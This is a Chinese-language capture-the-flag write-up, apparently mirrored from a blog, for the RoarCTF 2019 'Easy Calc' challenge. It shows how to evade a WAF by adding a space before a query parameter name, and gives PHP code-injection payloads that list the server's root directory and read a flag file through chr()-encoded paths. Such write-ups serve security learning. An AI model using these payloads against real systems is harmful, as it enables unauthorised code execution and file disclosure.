zoukankan      html  css  js  c++  java
  • [RoarCTF 2019]Easy Calc 思路

    Easy Calc思路,打开一看,输入1+9点下计算也计算出来了,减法也可以,答案正确,没看出来什么 ,直接f12查看源码,发现一段注释 可能是waf绕过

     接着我们继续寻找,发现了一段script代码,并且看到了一个calc.php

     让我们访问下calc.php文件吧

     如果给num的值为字母,则会报错,所以看了大佬的wp,在num变量前几个空格,这样一样,变量名就是" num"而不是"num",但是在php解析的时候,会把空格给去掉,这样跟我们想要的效果是一样的。还上传了非法字符。

    我们calc.php? num=1;var_dump(scandir(chr(47)))

    扫一下根目录,发现了flagg文件

     接着我们就继续构造payload: %20num=var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

    然后得到    flag{8e6ba3ee-7920-4697-8cc9-a4e03b9c2032}

  • 相关阅读:
    H
    并查集
    H
    Supermarket (贪心 并查集)
    H
    M
    N-Find a way
    HDU 4035 Maze
    #386. 【UNR #3】鸽子固定器
    P4688 [Ynoi2016]掉进兔子洞
  • 原文地址:https://www.cnblogs.com/junlebao/p/13684543.html
Copyright © 2011-2022 走看看